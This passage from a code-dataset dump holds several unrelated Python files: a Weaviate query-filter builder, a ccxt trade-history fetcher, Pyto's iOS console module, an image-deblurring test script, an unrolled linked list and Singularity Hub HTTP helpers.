\"\n                             f\"Given: {content}\")\n\n        self.path = json.dumps(content[\"path\"])\n        self.operator = content[\"operator\"]\n        self.value_type = _find_value_type(content)\n        self.value = content[self.value_type]\n\n    def _parse_operator(self, content: dict) -> None:\n        \"\"\"\n        Set operator fields for the Where filter.\n\n        Parameters\n        ----------\n        content : dict\n            The content of the `where` filter clause.\n\n        Raises\n        ------\n        ValueError\n            If 'content' is missing required fields.\n        \"\"\"\n\n        if \"operator\" not in content:\n            raise ValueError(\"Filter is missing required field `operator`.\"\n                             f\" Given: {content}\")\n        _content = deepcopy(content)\n        self.operator = _content[\"operator\"]\n        self.operands = []\n        for operand in _content[\"operands\"]:\n            self.operands.append(Where(operand))\n\n    def __str__(self):\n        if self.is_filter:\n            gql = f'where: {{path: {self.path} operator: {self.operator} {self.value_type}: '\n            if self.value_type in [\"valueInt\", \"valueNumber\"]:\n                gql += f'{self.value}}}'\n            elif self.value_type == \"valueBoolean\":\n                bool_value = str(self.value).lower()\n                gql += f'{bool_value}}}'\n            elif self.value_type == \"valueGeoRange\":\n                geo_value = json.dumps(self.value)\n                gql += f'{geo_value}}}'\n            else:\n                gql += f'\"{self.value}\"}}'\n            return gql + ' '\n\n        operands_str = []\n        for operand in self.operands:\n            # remove the `where: ` from the operands and the last space\n            operands_str.append(str(operand)[7:-1])\n        operands = \", \".join(operands_str)\n        return f'where: {{operator: {self.operator} operands: [{operands}]}} '\n\n\ndef _check_direction_clause(direction: dict) -> None:\n    \"\"\"\n    Validate the direction sub clause.\n\n    Parameters\n    ----------\n    direction : dict\n        A sub clause of the Explore filter.\n\n    Raises\n    ------\n    TypeError\n        If 'direction' is not a dict.\n    TypeError\n        If the value of the \"force\" key is not float.\n    ValueError\n        If no \"force\" key in the 'direction'.\n    \"\"\"\n\n    if not isinstance(direction, dict):\n        raise TypeError(f\"`move` clause should be dict but was {type(direction)}\")\n\n    if ('concepts' not in direction) and ('objects' not in direction):\n        raise ValueError(\"The 'move' clause should contain `concepts` OR/AND `objects`!\")\n\n    if 'concepts' in direction:\n        _check_concept(direction)\n    if 'objects' in direction:\n        _check_objects(direction)\n    if not \"force\" in direction:\n        raise ValueError(\"'move' clause needs to state a 'force'\")\n    if not isinstance(direction[\"force\"], float):\n        raise TypeError(f\"'force' should be float but was {type(direction['force'])}\")\n\n\ndef _check_concept(content: dict) -> None:\n    \"\"\"\n    Validate the concept sub clause.\n\n    Parameters\n    ----------\n    content : dict\n        An Explore (sub) clause to check for 'concepts'.\n\n    Raises\n    ------\n    ValueError\n        If no \"concepts\" key in the 'content' dict.\n    TypeError\n        If the value of the \"concepts\" is of wrong type.\n    \"\"\"\n\n    if \"concepts\" not in content:\n        raise ValueError(\"No concepts in content\")\n\n    if not isinstance(content[\"concepts\"], (list, str)):\n        raise TypeError(f\"Concepts must be of type list or str, not {type(content['concepts'])}\")\n    if isinstance(content[\"concepts\"], str):\n        content[\"concepts\"] = [content[\"concepts\"]]\n\n\ndef _check_objects(content: dict) -> None:\n    \"\"\"\n    Validate the `objects` sub clause of the `move` clause.\n\n    Parameters\n    ----------\n    content : dict\n        An Explore (sub) clause to check for 'objects'.\n\n    Raises\n    ------\n    ValueError\n        If no \"concepts\" key in the 'content' dict.\n    TypeError\n        If the value of the 
\"concepts\" is of wrong type.\n \"\"\"\n\n if not isinstance(content[\"objects\"], (list, dict)):\n raise TypeError(f\"'objects' must be of type list or dict, not {type(content['objects'])}\")\n if isinstance(content[\"objects\"], dict):\n content[\"objects\"] = [content[\"objects\"]]\n\n for obj in content[\"objects\"]:\n if len(obj) != 1 or ('id' not in obj and 'beacon' not in obj):\n raise ValueError('Each object from the `move` clause should have ONLY `id` OR '\n '`beacon`!')\n\n\ndef _check_certainty_type(certainty: float) -> None:\n \"\"\"\n Check 'certainty\n\n Parameters\n ----------\n certainty : float\n Certainty value to check if it is of type float.\n \"\"\"\n\n if not isinstance(certainty, float):\n raise TypeError(\"certainty is expected to be a float but was \"\n f\"{type(certainty)}\")\n\n\ndef _find_value_type(content: dict) -> str:\n \"\"\"\n Find the correct type of the content.\n\n Parameters\n ----------\n content : dict\n The content for which to find the appropriate data type.\n\n Returns\n -------\n str\n The correct data type.\n\n Raises\n ------\n ValueError\n If missing required fields.\n \"\"\"\n\n if \"valueString\" in content:\n to_return = \"valueString\"\n elif \"valueText\" in content:\n to_return = \"valueText\"\n elif \"valueInt\" in content:\n to_return = \"valueInt\"\n elif \"valueNumber\" in content:\n to_return = \"valueNumber\"\n elif \"valueDate\" in content:\n to_return = \"valueDate\"\n elif \"valueBoolean\" in content:\n to_return = \"valueBoolean\"\n elif \"valueGeoRange\" in content:\n to_return = \"valueGeoRange\"\n else:\n raise ValueError(f\"Filter is missing required fields: {content}\")\n return to_return\n","sub_path":"weaviate/gql/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":17791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"439365596","text":"#!/usr/bin/env python3\nimport ccxt\nimport os, json, asyncio, logging\nfrom os.path import basename\nfrom ccxt import ExchangeError\nfrom database import Database\nfrom tabulate import tabulate\nfrom colorama import Fore\nfrom datetime import datetime, timezone\nfrom dateutil.relativedelta import relativedelta\n\nmarkets = {}\nhistories = []\n\nasync def load_exchange(exchange):\n #print(f\"loading {exchange}\")\n ex_obj = getattr(ccxt, exchange)\n ex = ex_obj()\n ex.enableRateLimit = True\n try:\n ex.load_markets()\n markets[exchange] = ex\n print(f\"{exchange} loaded.\")\n except:\n print(f\"{exchange} NOT loaded!\")\n await asyncio.sleep(0.01)\n\n\ndef main():\n print(\"Fetch History demo\")\n os.chdir(\"ccxt\")\n\n filename = os.path.splitext(basename(__file__))[0] + \".log\"\n logging.basicConfig(filename=filename, level=logging.INFO, format=u'%(filename)s:%(lineno)d %(levelname)-8s [%(asctime)s] %(message)s')\n db = Database(os.getcwd() + \"\\\\database.ini\")\n #filename = os.path.splitext(__file__)[0] + \".log\"\n\n exchanges_list = db.query(\"select distinct exchange from mem.exchanges_pairs with (snapshot) where enabled=1\")['exchange'].tolist()\n\n tasks = [load_exchange(exchange) for exchange in exchanges_list]\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\n\n #exchanges = db.query(\"select id from exchanges where enabled=1\")['id'].tolist()\n pairs = db.query(\"select exchange, pair from mem.exchanges_pairs with (snapshot) where enabled=1\")\n\n # exchanges = 
['binance','huobipro','bittrex','cryptopia','exmo','hitbtc2','kraken','okex','poloniex','yobit']\n    # pair = \"ETH/USDT\"\n    limit = 100\n\n    # dt = datetime.strptime('01.09.2018 15:30:25', '%d.%m.%Y %H:%M:%S')\n    # ts = int(dt.replace(tzinfo=timezone.utc).timestamp())\n    # since = ts *1000\n    # print(f\"Selected pair: {pair}, start date: {dt.strftime('%d.%m.%Y %H:%M:%S')} [since={since}]\\n\")\n\n    for _, row in pairs.iterrows():\n        exchange, pair = row\n        print(f\"Fetching history for {exchange}/{pair}\")\n        histories = []  # reset so a failed fetch cannot re-save the previous pair's trades\n\n        if exchange not in markets:\n            continue\n\n        market = markets[exchange]\n\n        sql = f\"select timestamp from v_last_ts where exchange='{exchange}' and pair='{pair}'\"\n\n        dt = datetime.utcnow() - relativedelta(months=1) # month ago from now\n        try:\n            since_db = int(db.query(sql).values[0])+1\n        except:\n            since_db = 0  # no timestamp stored yet for this pair\n        since_1m = int(dt.replace(tzinfo=timezone.utc).timestamp())*1000\n        since = max(since_db, since_1m)\n\n        try:\n            histories = market.fetch_trades(symbol=pair, since=since, limit=limit)\n            \n        except ExchangeError: # Please specify a time window of no more than 1 month.\n            pass\n            # pair = pair.split(\"/\")[0]+\"/USD\" if pair.split(\"/\")[1]==\"USDT\" else pair.split(\"/\")[0]+\"/USDT\"\n            # histories = market.fetch_trades(symbol=pair, since=since, limit=limit)\n        except Exception as e:\n            print(f\"Error in {filename}.fetch_trades(). {Fore.YELLOW}{e}{Fore.RESET}\")\n            logging.info(f\"fetch_trades({exchange}/{pair}) FAILED!\")\n        \n        if histories != []:\n            try:\n                for row in histories: # remove info row from result set\n                    del row['info']\n            except:\n                pass\n\n            history = { 'exchange': exchange,\n                        'pair': pair,\n                        'histories': histories\n                    }    \n            try:\n                db.execute(\"mem.save_history_json\", json.dumps(history))\n            except Exception as e:\n                print(f\"Error in {filename}.mem.save_history_json(). 
{Fore.YELLOW}{e}{Fore.RESET}\")\n logging.info(f\"fetch_trades({exchange}/{pair}) FAILED!\")\n else:\n # search for acceptable since value\n since += 1000 # increment by a second\n logging.info(f\"fetch_trades({exchange}/{pair}) returned empty dataset, next ts={since}\")\n\n # status = \"WORKS\" if str(histories[0]['timestamp'])[:4] == str(since)[:4] else \"DOESN'T WORK!\"\n # print(f\"dt=[{histories[0]['datetime']}], ts=[{histories[0]['timestamp']}], price={histories[0]['price']} -- {status}\")\n # histories = []\n\nif __name__ == '__main__':\n main()","sub_path":"ccxt_demo/fetch_trades_since.py","file_name":"fetch_trades_since.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45703845","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module gives access to the console.\n\"\"\"\n\nif __host__ is not widget:\n from rubicon.objc import *\n from code import interact\n import stopit\n import pdb\n\nif __platform__ is iOS:\n import _codecompletion\n from pyto import *\n from pyto import __isMainApp__\n import os\n if __host__ is not widget:\n import builtins\n\nif __platform__ is macOS:\n import builtins\n\nimport importlib.util\nimport os\nimport sys\nimport traceback\nimport threading\nimport time\n\ndef __runREPL__():\n \n if __host__ is widget:\n return\n \n sys.argv = ['']\n \n Python.shared.isScriptRunning = True\n\n interact()\n\n# MARK: - Running\n\n__script__ = None\n\n__is_loop_running__ = False\n\n__i__ = 0\n\n__breakpoints__ = []\n\n__are_breakpoints_set__ = True\n\ndef run_script(path, replMode=False, debug=False, breakpoints=[]):\n \"\"\"\n Run the script at given path catching exceptions.\n \n This function should only be used internally by Pyto.\n \n Args:\n path: The path of the script.\n replMode: If set to `True`, errors will not be handled.\n debug: Set to `True` for debugging.\n breakpoints: Lines to break if debugging.\n \"\"\"\n \n if __platform__ is iOS:\n \n python = Python.shared\n \n currentDir = \"\"\n try:\n currentDir = str(python.currentWorkingDirectory)\n except:\n currentDir = os.path.expanduser(os.path.dirname(path))\n \n os.environ = {}\n for (key, value) in python.environment.items():\n os.environ[str(key)] = str(value)\n \n sys.argv = [path]\n for arg in python.args:\n if arg != \"\":\n sys.argv.append(str(arg))\n\n d=os.path.expanduser(\"~/tmp\")\n filesToRemove = [os.path.join(d,f) for f in os.listdir(d)]\n for f in filesToRemove:\n try:\n os.remove(f)\n except PermissionError:\n pass\n \n def run() -> None:\n \n if __platform__ is iOS:\n pip_directory = os.path.expanduser(\"~/Documents/modules\")\n Python.shared.isScriptRunning = True\n os.chdir(currentDir)\n try:\n sys.path.remove(pip_directory)\n except:\n pass\n sys.path.insert(-1, currentDir)\n sys.path.insert(-1, pip_directory)\n \n try:\n global __script__\n spec = importlib.util.spec_from_file_location(\"__main__\", path)\n __script__ = importlib.util.module_from_spec(spec)\n\n if debug and __platform__ is iOS and __host__ is not widget:\n \n try:\n console\n except:\n import console\n \n console.__are_breakpoints_set__ = False\n console.__breakpoints__ = breakpoints\n \n console.__i__ = -1\n\n old_input = input\n \n def debugger_input(prompt):\n \n try:\n console\n except:\n import console\n \n if not console.__are_breakpoints_set__:\n \n breakpoints = console.__breakpoints__\n console.__i__ += 1\n \n if len(breakpoints) < console.__i__:\n console.__are_breakpoints_set__ = True\n return \"\"\n \n 
try:\n breakpoints[console.__i__+1]\n except:\n console.__are_breakpoints_set__ = True\n \n return \"b \"+str(breakpoints[console.__i__])\n else:\n console.__should_inspect__ = True\n return old_input(prompt)\n \n if len(breakpoints) > 0:\n builtins.input = debugger_input\n \n pdb.main([\"pdb\", path])\n builtins.input = old_input\n else:\n spec.loader.exec_module(__script__)\n except SystemExit:\n pass\n except KeyboardInterrupt:\n pass\n except Exception as e:\n \n if __platform__ is iOS and not __isMainApp__() or replMode:\n print(traceback.format_exc())\n if not replMode:\n Python.shared.fatalError(str(e))\n else:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n \n extracts = traceback.extract_tb(sys.exc_info()[2])\n count = len(extracts)\n \n lineNumber = -1\n \n fileName = path\n for i, extract in enumerate(extracts):\n if extract[0] == fileName:\n lineNumber = extract[1]\n break\n count -= 1\n \n if (type(e) == SyntaxError): # The last word in a `SyntaxError` exception is the line number\n lineNumber = [int(s) for s in (str(e)[:-1]).split() if s.isdigit()][-1]\n\n if __platform__ is iOS:\n Python.shared.errorType = exc_type.__name__\n Python.shared.errorReason = str(e)\n for console in ConsoleViewController.visibles:\n if console.editorSplitViewController.editor.document.fileURL.path != path:\n continue\n console.editorSplitViewController.editor.showErrorAtLine(lineNumber)\n elif __platform__ is macOS:\n sys.stderr.write(\"Pyto.error_at_line;\"+str(lineNumber)+\";\")\n\n error = traceback.format_exc(limit=-count)\n\n if __platform__ is iOS:\n PyOutputHelper.printError(error)\n sys.path.remove(currentDir)\n else:\n sys.stderr.write(error+\"\\n\")\n\n if debug:\n pdb.post_mortem(exc_tb)\n\n if __platform__ is iOS and __isMainApp__():\n \n EditorViewController.runningLine = 0\n \n ConsoleViewController.enableDoneButton()\n \n ReviewHelper.shared.launches = ReviewHelper.shared.launches+1\n ReviewHelper.shared.requestReview()\n\n thread = threading.Thread(target=run, args=())\n \n def interruption_loop():\n while thread.isAlive():\n sys.__stdout__.write(str(Python.shared._isScriptRunning)+\"\\n\")\n if not Python.shared._isScriptRunning or Python.shared._interrupt:\n target_tid = 0\n for tid, tobj in threading._active.items():\n if tobj is thread:\n found = True\n target_tid = tid\n break\n \n if Python.shared._interrupt:\n stopit.async_raise(target_tid, KeyboardInterrupt)\n elif not Python.shared._isScriptRunning:\n stopit.async_raise(target_tid, SystemExit)\n \n Python.shared._interrupt = False\n \n if thread.isAlive:\n Python.shared._isScriptRunning = True\n \n time.sleep(1)\n \n if __platform__ is iOS:\n Python.shared.isScriptRunning = True\n Python.shared._isScriptRunning = True\n \n if __platform__ is iOS:\n thread.start()\n else:\n run()\n\n if __host__ is not widget and __platform__ is iOS:\n interruption_loop()\n\n if __platform__ is iOS:\n sys.__stdout__.write(\"Execution finished\\n\")\n\n if __platform__ is iOS:\n Python.shared._isScriptRunning = False\n Python.shared.isScriptRunning = False\n\n sys.path = list(dict.fromkeys(sys.path))\n\n return __script__\n\n# MARK: - I/O\n\nignoredThreads = []\n\"\"\"\nAll output and input request from these threads will be ignored.\n\"\"\"\n\ndef __consoles__():\n if __platform__ is iOS and __host__ is widget:\n return [ConsoleViewController.visible]\n elif __platform__ is iOS:\n return ConsoleViewController.visibles\n else:\n return\n\ndef clear():\n \"\"\"\n Clears the console.\n \"\"\"\n \n if threading.current_thread() in 
ignoredThreads:\n return\n \n if __platform__ is macOS:\n print(\"Pyto.console.clear\")\n else:\n for console in __consoles__():\n console.clear()\n time.sleep(0.1)\n\nif __platform__ is iOS:\n __PyInputHelper__ = PyInputHelper\n\ndef input(prompt=\"\"):\n \"\"\"\n Requests input with given prompt.\n \n Args:\n prompt: Text printed before the user's input without a newline.\n \"\"\"\n \n if __platform__ is macOS:\n return builtins.input(prompt)\n \n if __host__ is widget:\n return None\n \n NSBundle = ObjCClass(\"NSBundle\")\n if NSBundle.mainBundle.bundlePath.pathExtension == \"appex\":\n return None\n \n __PyInputHelper__.userInput = None\n \n __PyInputHelper__.showAlertWithPrompt(prompt)\n \n while __PyInputHelper__.userInput == None or threading.currentThread() in ignoredThreads:\n time.sleep(0.2)\n \n userInput = __PyInputHelper__.userInput\n __PyInputHelper__.userInput = None\n \n return str(userInput)\n\ndef print(*objects, sep=None, end=None):\n \"\"\"\n Prints to the Pyto console, not to the stdout. Works as the builtin `print` function but does not support printing to a custom file. Pyto catches by default the stdout and the stderr, so use the builtin function instead. This function is mainly for internal use.\n \"\"\"\n \n if __platform__ is macOS:\n return builtins.print(objects, sep=sep, end=end)\n \n if sep is None:\n sep = ' '\n if end is None:\n end = '\\n'\n array = map(str, objects)\n PyOutputHelper.print(sep.join(array)+end)\n\n# MARK: - Alerts\n\nif __host__ is not widget:\n\n if __platform__ is iOS:\n PyAlert = PyAlert\n \"\"\"\n A class representing an alert.\n\n Example:\n\n alert = console.Alert.alertWithTitle(\"Hello\", message=\"Hello World!\")\n alert.addAction(\"Ok\")\n alert.addCancelAction(\"Cancel\")\n if (alert.show() == \"Ok\"):\n print(\"Good Bye!\")\n \"\"\"\n\n class Alert:\n \"\"\"\n A wrapper of `PyAlert` Objective-C class on iOS and `NSAlert` on macOS that represents an UI alert.\n \"\"\"\n \n if __platform__ is iOS:\n pyAlert = None\n \"\"\"\n The Objective-C representation.\n \"\"\"\n elif __platform__ is macOS:\n nsAlert = None\n \"\"\"\n The Objective-C representation.\n \"\"\"\n \n def __init__(self):\n \n if __platform__ is iOS:\n self.pyAlert = PyAlert.alloc().init()\n elif __platform__ is macOS:\n from ctypes import cdll\n cdll.LoadLibrary(\"/System/Library/Frameworks/Cocoa.framework/Versions/Current/Cocoa\")\n self.nsAlert = ObjCClass(\"NSAlert\").alloc().init()\n \n @staticmethod\n def alertWithTitle(title, message):\n \"\"\"\n Creates an alert.\n \n Args:\n title: The title of the alert.\n message: The message of the alert.\n \"\"\"\n \n alert = Alert()\n if __platform__ is iOS:\n alert.pyAlert.title = title\n alert.pyAlert.message = message\n elif __platform__ is macOS:\n alert.nsAlert.informativeText = title\n alert.nsAlert.messageText = message\n return alert\n \n __actions__ = []\n\n def addAction(self, title):\n \"\"\"\n Add an action with given title.\n \n Args:\n title: The title of the action.\n \"\"\"\n \n if __platform__ is iOS:\n self.pyAlert.addAction(title)\n else:\n self.nsAlert.addButtonWithTitle_(title)\n self.__actions__.append(title)\n \n def addDestructiveAction(self, title):\n \"\"\"\n Add a destructive action with given title.\n \n Args:\n title: The title of the action.\n \"\"\"\n \n if __platform__ is macOS:\n raise NotImplementedError(\"`addDestructiveAction` cannot be used on macOS. 
Use `addAction`.\")\n            \n            self.pyAlert.addDestructiveAction(title)\n\n        def addCancelAction(self, title):\n            \"\"\"\n            Add a cancel action with given title. Can only be added once.\n            \n            Args:\n                title: The title of the action.\n            \"\"\"\n            \n            if __platform__ is macOS:\n                raise NotImplementedError(\"`addCancelAction` cannot be used on macOS. Use `addAction`.\")\n            \n            if not self.pyAlert.addCancelAction(title):\n                raise ValueError(\"There is already a cancel action.\")\n        \n        def show(self):\n            \"\"\"\n            Shows alert.\n            \n            Returns the title of the selected action.\n            \"\"\"\n            \n            if __platform__ is iOS:\n                return self.pyAlert._show()\n            elif __platform__ is macOS:\n                \n                def order_front():\n                    time.sleep(0.1)\n                    self.nsAlert.window.orderFrontRegardless()\n                \n                threading.Thread(target=order_front).start()\n                \n                return self.__actions__[self.nsAlert.runModal()-1000]\n\nelse:\n    PyAlert = None\n    Alert = None\n\n__all__ = [\"Alert\", \"clear\", \"print\", \"input\"]\n","sub_path":"site-packages/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":14137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"413184820","text":"import warnings\nimport multiprocessing as mp\nimport time\nimport os\nimport numpy as np\nfrom scipy.io import loadmat\nwarnings.filterwarnings(\"ignore\")\n\nfrom BP3MG.PAR3MG_MPI import PAR3MG_MPI\nfrom PSF_tools.gaussian_kernel_3D import gaussian_kernel_3D\nfrom BD3MG.blur_alt_z import blur_alt_z\nfrom BD3MG.adjblur_alt_z import adjblur_alt_z\n\n\n#Loading image\nI = loadmat(os.getcwd() + '/Images/FlyBrain.mat')['I']\nNx = 128\nNy = Nx\nNz = 24\nsli = slice(0,256,int(256/Nx))\nI = I[sli,sli,:Nz]\n\nprint('Create blurry and noisy image')\nprint('size image: Nx = ', Nx, ', Ny = ', Ny, ', Nz = ',Nz)\n\n#Degradation parameters\nNh = np.array([5,5,11]).astype(int)\nSx = np.random.rand(Nz, 1) * 3\nSy = np.random.rand(Nz, 1) * 3\nSz = np.random.rand(Nz, 1) * 4\nPhiy = np.random.rand(Nz, 1) * 2 * np.pi * 0\nPhiz = np.random.rand(Nz, 1) * 2 * np.pi\n\n\n#getting convolution kernel\ndef h(z):\n    return gaussian_kernel_3D(((Nh-1)/2).astype(int), [Sx[z], Sy[z], Sz[z]], [Phiy[z], Phiz[z]])\nprint('size kernel: Nx = {}, Ny = {}, Nz = {}'.format(*h(0).shape))\n\n#SNR = 20;\nsigma = 0.02\n\n#add blur and noise in a parallel fashion\nstart = time.time()\npool = mp.Pool(mp.cpu_count())\nresults = [pool.apply(blur_alt_z, args=(I, Nh, Nx, Ny, Sx, Sy, Sz, Phiy, Phiz, sigma, z)) for z in range(Nz)]\npool.close()\n\nIblurnoisy, Iblurz, BSNRinitz, SNRinitz = zip(*results)\nIblurnoisy = np.dstack(Iblurnoisy)\nIblur = np.dstack(Iblurz)\n\n\ncpu_time_blur = time.time()-start\n\nSNRinit = 10*np.log10(np.sum(I**2)/np.sum((I-Iblurnoisy)**2))\nBSNRinit = 10*np.log10(np.sum(I**2)/np.sum((I-Iblur)**2))\nprint('SNR init = ', str(SNRinit),', BSNRinit = ', str(BSNRinit))\n\n\ny = Iblurnoisy.reshape(Nx*Ny, Nz)\n#we need these vectors in the algorithm\n\npool = mp.Pool(mp.cpu_count())\nresults = [pool.apply(adjblur_alt_z, args=(Iblurnoisy, z, Nh, Nx, Ny, Nz, Sx, Sy, Sz, Phiy, Phiz)) for z in range(Nz)]\npool.close()\n\nHty, H1Z = zip(*results)\nHty = np.dstack(Hty)\nH1 = np.dstack([H1Z[z][:,:,z] for z in range(len(H1Z))])\n\n\nprint('Elapsed time : ', cpu_time_blur)\nprint('done')\n\n\nTimemax = 600\nNbIt = 10000 #Max iterations number\n#Regularization parameters:\nlambda_ = 1\ndelta = 2\nphi = 4\n#Bounds of the constrained domain:\nxmin = 0\nxmax = 1\n#Elastic net parameter:\ntau = 1e-3\n#Weight of the quadratic distance function :Gradz\neta = 0.1\n#Initialization\nx0 = 
np.zeros((Nx, Ny, Nz))\n\n\nTimes = {}\nTimesending ={}\nCrits = {}\nratio = {}\nSNR = {}\ncores=mp.cpu_count()\n\n\nBMMD = PAR3MG_MPI(y, h, Hty, H1, eta, tau, lambda_, delta, xmin, xmax, phi, x0, I, Nx, Ny, Nz, NbIt, cores, Timemax)\nBMMD.optimize()\nCrits[cores] = BMMD.Crit\nTimes[cores] = np.cumsum(BMMD.Time)\nSNR[cores] = BMMD.SNR\n\n\nf = open(\"Times.txt\",\"w\")\nf.write( str(Times) )\nf.close()\n\nf = open(\"Crits.txt\",\"w\")\nf.write( str(Crits) )\nf.close()\n\nf = open(\"SNR.txt\",\"w\")\nf.write( str(SNR) )\nf.close()\n\n","sub_path":"BD3MG/BP3MG/Test_synch.py","file_name":"Test_synch.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19333091","text":"\nclass Node:\n def __init__(self, max_size, next=None):\n self.el_num = 0\n self.elements = [None] * max_size\n self.next = next\n\nclass UnrolledLinkedList:\n def __init__(self, node_size):\n self._node_size = node_size\n self._head = Node(node_size, None)\n\n def append(self, data):\n node = self._head\n while node.next is not None:\n node = node.next\n\n if node.el_num == self._node_size:\n new_node = Node(self._node_size, node.next)\n node.next, node = new_node, new_node\n\n node.elements[node.el_num] = data\n node.el_num += 1\n\n def delete(self, predicate):\n node = self._head\n while node is not None:\n for i in range (0, node.el_num):\n if predicate(node.elements[i]):\n while i + 1 < node.el_num:\n node.elements[i], i = node.elements[i+1], i + 1\n node.el_num -= 1\n node = node.next\n\n def shrink(self):\n node = self._head\n new_node = self._head = Node(self._node_size)\n while node is not None:\n for i in range(node.el_num):\n if new_node.el_num == self._node_size:\n new_node.next = Node(self._node_size)\n new_node = new_node.next\n new_node.elements[new_node.el_num] = node.elements[i]\n new_node.el_num += 1\n node = node.next\n\n def __str__(self):\n node, sr = self._head, ''\n while node is not None:\n sr += '['\n for i in range(0, node.el_num):\n sr += str(node.elements[i])\n sr += ',' if i != node.el_num - 1 else ']'\n node = node.next\n if node is not None:\n sr += ' -> '\n return sr\n\nif __name__ == '__main__':\n lst = UnrolledLinkedList(4)\n\n print('\\ncreate:')\n for i in range(22):\n lst.append(i)\n print(lst)\n\n print('\\ndelete:')\n lst.delete(lambda x: x % 2 == 0)\n print(lst)\n\n print('\\nshrink:')\n lst.shrink()\n print(lst)","sub_path":"data-structures/list/unrolled-linked-list.py","file_name":"unrolled-linked-list.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"557067610","text":"#!/usr/bin/env python\n\n'''\nutils.py: general http functions (utils) for som api\n\nThe MIT License (MIT)\n\nCopyright (c) 2016-2017 Vanessa Sochat\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED 
TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\n'''\n\nfrom singularity.logman import bot\nfrom singularity.hub.auth import get_headers\n\nimport requests\nimport os\nimport tempfile\nimport sys\n\ntry:\n from urllib.error import HTTPError\nexcept ImportError:\n from urllib2 import HTTPError\n\n\ndef paginate_get(url,headers=None,token=None,data=None,return_json=True,stream_to=None,\n start_page=None):\n '''paginate_get is a wrapper for api_get to get results until there isn't an additional page\n '''\n if start_page == None:\n url = '%s&page=1' %(url)\n else:\n url = '%s&page=%s' %(url,start_page)\n\n results = []\n while url is not None:\n result = api_get(url)\n if 'results' in result:\n results = results + result['results']\n url = result['next']\n return results\n \n\n\ndef api_get(url,headers=None,token=None,data=None, return_json=True, stream_to=None):\n '''api_get will use requests to get a particular url\n :param url: the url to send file to\n :param headers: a dictionary with headers for the request\n :param putdata: additional data to add to the request\n :param return_json: return json if successful\n :param stream_to: stream the response to file\n '''\n bot.logger.debug(\"GET %s\",url)\n\n stream = False\n if stream_to is not None:\n stream = True\n\n if headers == None:\n headers = get_headers(token=token)\n\n if data == None:\n response = requests.get(url, \n headers=headers,\n stream=stream)\n else:\n response = requests.get(url, \n headers=headers,\n json=data,\n stream=stream)\n\n if response.status_code == 200 and return_json and not stream:\n return response.json()\n\n \n chunk_size = 1 << 20\n with open(stream_to,'wb') as filey:\n for chunk in response.iter_content(chunk_size=chunk_size):\n filey.write(chunk)\n\n return stream_to \n\n\n\ndef api_put(url,headers=None,token=None,data=None, return_json=True):\n '''api_put will send a read file (spec) to Singularity Hub with a particular set of headers\n :param url: the url to send file to\n :param headers: the headers to get\n :param headers: a dictionary with headers for the request\n :param data: additional data to add to the request\n :param return_json: return json if successful\n '''\n bot.logger.debug(\"PUT %s\",url)\n\n if headers == None:\n headers = get_headers(token=token)\n if data == None:\n response = requests.put(url, \n headers=headers)\n else:\n response = requests.put(url, \n headers=headers,\n json=data)\n \n if response.status_code == 200 and return_json:\n return response.json()\n\n return response\n\n\ndef api_post(url,headers=None,data=None,token=None,return_json=True):\n '''api_get will use requests to get a particular url\n :param url: the url to send file to\n :param headers: a dictionary with headers for the request\n :param data: additional data to add to the request\n :param return_json: return json if successful\n '''\n bot.logger.debug(\"POST %s\",url)\n\n if headers == None:\n headers = get_headers(token=token)\n if data == None:\n response = requests.post(url, \n headers=headers)\n else:\n response = requests.post(url, \n headers=headers,\n json=data)\n\n if response.status_code == 200 and return_json:\n return response.json()\n\n return 
response\n\n\n######################################################################\n# OS/IO and Formatting Functions\n######################################################################\n\n\ndef is_number(container_name):\n '''is_number determines if the user is providing a singularity hub\n number (meaning the id of an image to download) vs a full name)\n '''\n if isinstance(container_name,dict):\n return False\n try:\n float(container_name)\n return True\n except ValueError:\n return False\n\n\ndef parse_container_name(image):\n '''parse_container_name will return a json structure with a repo name, tag, user.\n '''\n container_name = image\n if not is_number(image):\n image = image.replace(' ','')\n\n # If the user provided a number (unique id for an image), return it\n if is_number(image) == True:\n bot.logger.info(\"Numeric image ID %s found.\", image)\n return int(image)\n\n image = image.split('/')\n\n # If there are two parts, we have username with repo (and maybe tag)\n if len(image) >= 2:\n user = image[0]\n image = image[1]\n\n # Otherwise, we trigger error (not supported just usernames yet)\n else:\n bot.logger.error('You must specify a repo name and username, %s is not valid',container_name)\n sys.exit(1)\n\n # Now split the name by : in case there is a tag\n image = image.split(':')\n if len(image) == 2:\n repo_name = image[0]\n repo_tag = image[1]\n\n # Otherwise, assume latest of an image\n else:\n repo_name = image[0]\n repo_tag = \"latest\"\n\n bot.logger.info(\"User: %s\", user)\n bot.logger.info(\"Repo Name: %s\", repo_name)\n bot.logger.info(\"Repo Tag: %s\", 